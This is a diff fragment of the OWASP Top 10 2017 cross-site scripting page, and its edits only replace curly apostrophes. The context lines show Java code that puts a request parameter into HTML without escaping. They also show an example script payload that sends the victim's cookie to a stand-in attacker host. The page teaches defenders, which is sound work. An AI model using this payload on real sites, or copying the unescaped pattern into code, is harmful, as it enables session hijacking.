OWASP/Top10/2017/en/0xA7-XSS.md

 `(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";`

-The attacker manipulates the ‘CC’ parameter in his browser to:
+The attacker manipulates the ‘CC' parameter in his browser to:

 `'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'`

-This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
+This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.
 Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ.
 See 2017-A8 for information on CSRF.

 ## References